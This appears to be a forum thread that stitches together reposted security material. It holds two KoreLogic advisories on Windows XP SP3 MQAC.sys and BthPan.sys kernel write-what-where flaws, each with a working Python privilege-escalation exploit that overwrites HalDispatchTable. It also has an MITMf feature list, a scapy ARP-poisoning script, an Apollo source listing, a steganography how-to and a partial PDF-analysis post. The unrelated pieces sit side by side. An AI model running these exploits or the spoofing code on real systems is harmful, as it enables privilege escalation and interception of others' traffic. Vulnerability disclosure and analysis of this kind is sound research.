Affected Vendor: Microsoft
Affected Product: MQ Access Control
Affected Versions: 5.1.0.1110
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000.

STACK_TEXT:
b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d
b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d
b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31
b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70
b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver.

FOLLOWUP_IP:
mqac!AC2QM+5d
b230af37 891e mov dword ptr [esi],ebx

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)
ErrCode = 00000002
eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000
eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
mqac!AC2QM+0x5d:
b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????

A write-what-where vulnerability can be leveraged to obtain escalated privileges.
To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft responds to KoreLogic that the vulnerability does not affect an "up-platform" product. Says they are investigating embedded platforms. Does not provide a CVE number or a disclosure date.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued to this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to be identical to KL-001-2014-002 and issues CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.

7. Proof of Concept

#!/usr/bin/python2
#
# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit

EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them
def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None

handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\x50\x00\x00\x00"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)

The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

Sursa: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation ? Packet Storm
-
Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Authored by Matthew Bergin

A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft Bluetooth Personal Area Networking version 5.1.2600.5512 on XP SP3 is affected.

Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-002
Publication Date: 2014-07-18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: Bluetooth Personal Area Networking
Affected Versions: 5.1.2600.5512
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000.

STACK_TEXT:
b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver.
FOLLOWUP_IP:
bthpan!BthpanReqAdd+16b
b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)
ErrCode = 00000002
eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203
nt!IopCompleteRequest+0x92:
804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft informs KoreLogic that the vulnerability does not impact any "up-platform" products. Says they are investigating embedded platforms. Does not provide CVE number.
2014.06.24 - Microsoft contacts KoreLogic to say that they confused the report of this vulnerability with another and that they cannot reproduce the described behavior. Microsoft asks for an updated Proof-of-Concept, crash dumps or any further analysis of the vulnerability that KoreLogic can provide.
2014.06.25 - KoreLogic provides Microsoft with an updated Proof-of-Concept which demonstrates using the vulnerability to spawn a system shell.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued for this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be identical to KL-001-2014-003 and issues CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.

7. Proof of Concept

#!/usr/bin/python2
#
# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit

EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them
def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None

handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == INVALID_HANDLE_VALUE):
    print "[!] Could not open handle to BthPan"
    exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)

The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

Sursa: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation ≈ Packet Storm
-
MITMf

Framework for Man-In-The-Middle attacks. Quick tutorial and examples at Trying to take the dum-dum out of security...

This tool is completely based on sergio-proxy (https://code.google.com/p/sergio-proxy/) and is an attempt to revive and update the project.

Available plugins:

ArpSpoof - Redirect traffic using ARP spoofing
BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables being sent over HTTP using bdfactory
Inject - Inject arbitrary content into HTML content
JavaPwn - Performs drive-by attacks on clients with out-of-date Java browser plugins
jskeylogger - Injects a JavaScript keylogger into clients' webpages
Replace - Replace arbitrary content in HTML content
SMBAuth - Evoke SMB challenge-response auth attempts
Upsidedownternet - Flips images 180 degrees

Sursa: https://github.com/byt3bl33d3r/MITMf
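For context on what the ArpSpoof plugin is actually doing, here is a minimal ARP-spoofing sketch using scapy. This is not MITMf code and the addresses are lab placeholders; a real man-in-the-middle would also poison the gateway about the victim and enable IP forwarding so traffic keeps flowing.

#!/usr/bin/env python
# Illustrative ARP spoofing sketch using scapy (NOT MITMf code).
# It repeatedly tells the victim that the gateway's IP lives at our MAC,
# so the victim sends gateway-bound traffic to us instead.
import time
from scapy.all import ARP, getmacbyip, send

victim_ip  = "192.168.1.10"   # placeholder
gateway_ip = "192.168.1.1"    # placeholder

victim_mac = getmacbyip(victim_ip)   # may be None if the host is not up

# op=2 is an ARP "is-at" reply; scapy fills in our interface MAC as the source.
poison = ARP(op=2, psrc=gateway_ip, pdst=victim_ip, hwdst=victim_mac)

try:
    while True:
        send(poison, verbose=False)
        time.sleep(2)   # re-poison periodically so the victim's ARP cache stays stale
except KeyboardInterrupt:
    pass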
-
Directory listing (all files dated 27-Jul-2009 19:49):

AGC_BLOCK_TWO_SELF-CHECK.agc.html  94K
ALARM_AND_ABORT.agc.html  35K
ANGLFIND.agc.html  98K
ASSEMBLY_AND_OPERATION_INFORMATION.agc.html  175K
AUTOMATIC_MANEUVERS.agc.html  83K
Apollo32.png  2.6K
CM_BODY_ATTITUDE.agc.html  49K
CM_ENTRY_DIGITAL_AUTOPILOT.agc.html  212K
CONIC_SUBROUTINES.agc.html  301K
CONTRACT_AND_APPROVALS.agc.html  13K
CSM_GEOMETRY.agc.html  64K
DISPLAY_INTERFACE_ROUTINES.agc.html  242K
DOWN-TELEMETRY_PROGRAM.agc.html  81K
DOWNLINK_LISTS.agc.html  76K
ENTRY_LEXICON.agc.html  56K
ERASABLE_ASSIGNMENTS.agc.html  642K
EXECUTIVE.agc.html  82K
EXTENDED_VERBS.agc.html  214K
FIXED_FIXED_CONSTANT_POOL.agc.html  48K
FRESH_START_AND_RESTART.agc.html  239K
GIMBAL_LOCK_AVOIDANCE.agc.html  14K
GROUND_TRACKING_DETERMINATION_PROGRAM.agc.html  34K
IMU_CALIBRATION_AND_ALIGNMENT.agc.html  226K
IMU_COMPENSATION_PACKAGE.agc.html  64K
IMU_MODE_SWITCHING_ROUTINES.agc.html  169K
INFLIGHT_ALIGNMENT_ROUTINES.agc.html  45K
INTEGRATION_INITIALIZATION.agc.html  188K
INTER-BANK_COMMUNICATION.agc.html  32K
INTERPRETER.agc.html  507K
INTERPRETIVE_CONSTANTS.agc.html  12K
INTERRUPT_LEAD_INS.agc.html  19K
JET_SELECTION_LOGIC.agc.html  155K
KALCMANU_STEERING.agc.html  45K
KEYRUPT_UPRUPT.agc.html  24K
LATITUDE_LONGITUDE_SUBROUTINES.agc.html  49K
LUNAR_AND_SOLAR_EPHEMERIDES_SUBROUTINES.agc.html  32K
LUNAR_LANDMARK_SELECTION_FOR_CM.agc.html  6.2K
MAIN.agc.html  296K
MEASUREMENT_INCORPORATION.agc.html  80K
MYSUBS.agc.html  16K
ORBITAL_INTEGRATION.agc.html  145K
P11.agc.html  149K
P20-P25.agc.html  579K
P30-P37.agc.html  95K
P32-P33_P72-P73.agc.html  218K
P34-35_P74-75.agc.html  275K
P37_P70.agc.html  313K
P40-P47.agc.html  395K
P51-P53.agc.html  347K
P61-P67.agc.html  192K
P76.agc.html  28K
PHASE_TABLE_MAINTENANCE.agc.html  66K
PINBALL_GAME_BUTTONS_AND_LIGHTS.agc.html  653K
PINBALL_NOUN_TABLES.agc.html  158K
PLANETARY_INERTIAL_ORIENTATION.agc.html  61K
POWERED_FLIGHT_SUBROUTINES.agc.html  60K
R30.agc.html  87K
R31.agc.html  48K
R60_62.agc.html  64K
RCS-CSM_DAP_EXECUTIVE_PROGRAMS.agc.html  15K
RCS-CSM_DIGITAL_AUTOPILOT.agc.html  164K
REENTRY_CONTROL.agc.html  242K
RESTARTS_ROUTINE.agc.html  52K
RESTART_TABLES.agc.html  81K
RT8_OP_CODES.agc.html  56K
S-BAND_ANTENNA_FOR_CM.agc.html  24K
SERVICER207.agc.html  121K
SERVICE_ROUTINES.agc.html  42K
SINGLE_PRECISION_SUBROUTINES.agc.html  12K
STABLE_ORBIT.agc.html  68K
STAR_TABLES.agc.html  27K
SXTMARK.agc.html  105K
SYSTEM_TEST_STANDARD_LEAD_INS.agc.html  22K
T4RUPT_PROGRAM.agc.html  232K
TAGS_FOR_RELATIVE_SETLOC.agc.html  66K
TIME_OF_FREE_FALL.agc.html  118K
TPI_SEARCH.agc.html  91K
TVCDAPS.agc.html  124K
TVCEXECUTIVE.agc.html  46K
TVCINITIALIZE.agc.html  69K
TVCMASSPROP.agc.html  37K
TVCRESTARTS.agc.html  45K
TVCROLLDAP.agc.html  101K
TVCSTROKETEST.agc.html  42K
UPDATE_PROGRAM.agc.html  95K
WAITLIST.agc.html  86K

Sursa: Index of /apollo/listings/Comanche055
-
Steganography: The Art of Hiding Information

What with all of the spying and whatnot, we all need a private space for those things we do want to hide. Cryptography or encryption can be used to protect content, but it does not hide data from a third party; it makes the data unreadable to a third party. And then there is steganography, the science, or rather, the art of hiding data.

You can, for example, hide files in an image, like so:

cat technocracy.jpg littlesecrets.tar.gz > makeithardertobespiedon.jpg

The command cat reads the image file (in this case technocracy.jpg) and the compressed directory littlesecrets.tar.gz and then concatenates image and compressed file together in a new file, makeithardertobespiedon.jpg (use any name you like). To get your files back, simply uncompress the makeithardertobespiedon image file.

Obviously, combining the two - compressing an encrypted directory and concatenating it into an image file - makes it even harder to be spied on. You can do this yourself, using your chosen encryption scheme and then the above, or you can use a tool. If and when you use a tool, I recommend researching local laws on encryption and its exportation before use.

Tools

Steghide, for example, is a steganography program that is able to hide data in various kinds of image and audio files. The color- respectively sample-frequencies are not changed, thus making the embedding resistant against first-order statistical tests. Note that the steghide code is hosted on SourceForge, which was bought by Dice Holdings in 2012. I used the command line for steghide when I experimented with it, but there are graphical front-ends. I haven't tried those.

More tools can be found here (comparison table). My requirements would be:

FOSS licensed (preferably GNU licensed)
cross-platform (must run on GNU/Linux)
support of additional cryptography

Detectable?

In 2001 Niels Provos searched for images that might contain hidden messages using stegdetect and stegbreak. Like I said, we are making it harder. A lot harder. But ...

For every clever method and tool being developed to hide information in multimedia data, an equal number of clever methods and tools are being developed to detect and reveal its secrets. ~ Cyber Warfare: Steganography vs. Steganalysis (pdf)

More on steganography

The Black Chamber
Detecting Steganographic Content on the Internet (pdf)
Computer Forensics, Cybercrime and Steganography Resources: Steganography & Data Hiding – Links & Whitepapers (latest entry from 2008)
An Overview of Steganography for the Computer Forensics Examiner
Cyber Warfare: Steganography vs. Steganalysis (pdf)

Sursa: https://lilithlela.cyberguerrilla.org/?p=6620
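If you would rather script the concatenation trick than shell it, a minimal Python sketch of both the embed and extract steps follows. The file names match the article's example; the extraction naively carves from the first gzip magic bytes it finds, which assumes that sequence does not occur inside the image data itself.

#!/usr/bin/env python
# Hide-by-concatenation sketch: append a tar.gz to a JPEG, then carve it back out.
import tarfile

GZIP_MAGIC = b"\x1f\x8b"

def embed(image="technocracy.jpg", payload="littlesecrets.tar.gz",
          out="makeithardertobespiedon.jpg"):
    # Same effect as: cat technocracy.jpg littlesecrets.tar.gz > makeithardertobespiedon.jpg
    with open(out, "wb") as dst:
        for name in (image, payload):
            with open(name, "rb") as src:
                dst.write(src.read())

def extract(container="makeithardertobespiedon.jpg", out="recovered.tar.gz"):
    # Naive carve: everything from the first gzip magic onward is the archive.
    with open(container, "rb") as f:
        data = f.read()
    offset = data.find(GZIP_MAGIC)
    if offset <= 0:
        raise ValueError("no embedded archive found")
    with open(out, "wb") as f:
        f.write(data[offset:])
    tarfile.open(out, "r:gz").extractall("recovered")

if __name__ == "__main__":
    embed()
    extract()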
-
[h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h]

[h=2]What is that thing they call a PDF?[/h]

The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (ISO 32000-1) until 2008 - right @nullandnull ? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal.

The PDF has become a de facto standard for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards </rant>

We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing, but since they're so common they're still a reliable delivery method for malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (Do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (to be fair, the sandboxed versions and other security controls these days have helped significantly)

Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports

[h=3]What does a PDF consist of?[/h]

In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know)

If we create a simple PDF (this example only contains a single word in it) we can see a better idea of the contents we'd expect to see:

[h=2]What else is out there?[/h]

Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may be an overlap of others out there but that's mainly because the results of our research produced similar results or our minds think alike... I'm not going to touch on every tool out there but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality/lack of functionality is what sparked me to write AnalyzePDF. By mentioning the tools below my intentions aren't to downplay them and/or their ability to analyze PDF's but rather to help show the reasons I ended up doing what I did.

[h=4]pdfid/pdf-parser[/h]

Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done I decided they were the best to wrap around. Did you know that pdfid has a lot more capabilities/features than most are aware of?
If you run it with the (-h) switch you'll see some other useful options such as the (-e) which display extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations. During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected as I was testing a large data set of who knows what kind of PDF's. Again, I'm not noting these to put down anyone's tools but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested if the newer version fixed anything so I'd rather give the files that I know work with it for everyone. I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. - cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's since if the '%%EOF' is the last thing in the file without a '/r' or '/n' behind it, it doesn't seem to count it. I've had cases where the '/Pages' count was incorrect - there were (15) PDF's that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages/ values. (e.g. - ac0487e8eae9b2323d4304eaa4a2fdfce4c94131) There were times when the number of characters after the last '%%EOF' were incorrect Won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g - cbf76a32de0738fea7073b3d4b3f1d60) : [h=4]peepdf[/h] Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid 